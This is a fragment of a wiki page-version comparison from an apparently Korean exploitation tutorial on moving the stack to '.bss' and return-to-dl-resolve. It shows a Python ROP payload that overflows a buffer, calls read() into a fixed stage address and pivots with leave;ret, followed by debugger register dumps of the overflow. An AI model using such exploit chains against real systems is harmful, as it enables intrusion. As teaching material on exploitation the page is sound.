Versions Compared

Old Version 6

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 7

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titleMove to ".bss"
#read(0,base_stage,100)
#jmp base_stage
buf1 = 'A'* 62
buf1 += p32(addr_plt_read)
buf1 += p32(addr_pop3)
buf1 += p32(0)
buf1 += p32(base_stage)
buf1 += p32(100)
buf1 += p32(addr_pop_ebp)
buf1 += p32(base_stage)
buf1 += p32(addr_leave_ret)
  • asdf
Code Block
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x601440 ("AAAAAAAA\n\006@")
RSP: 0x7ffdc28c1b38 --> 0x7ffdc28c1b60 --> 0x1 
RIP: 0x400585 (<vuln+31>:	leave)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x601448 --> 0x40060a (<__libc_csu_init+90>:	pop    rbx)
RIP: 0x400586 (<vuln+32>:	ret)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')

Return-to-dl-resolve

  • ".bss" 영역에 다음과 같이 Data를 저장합니다.

...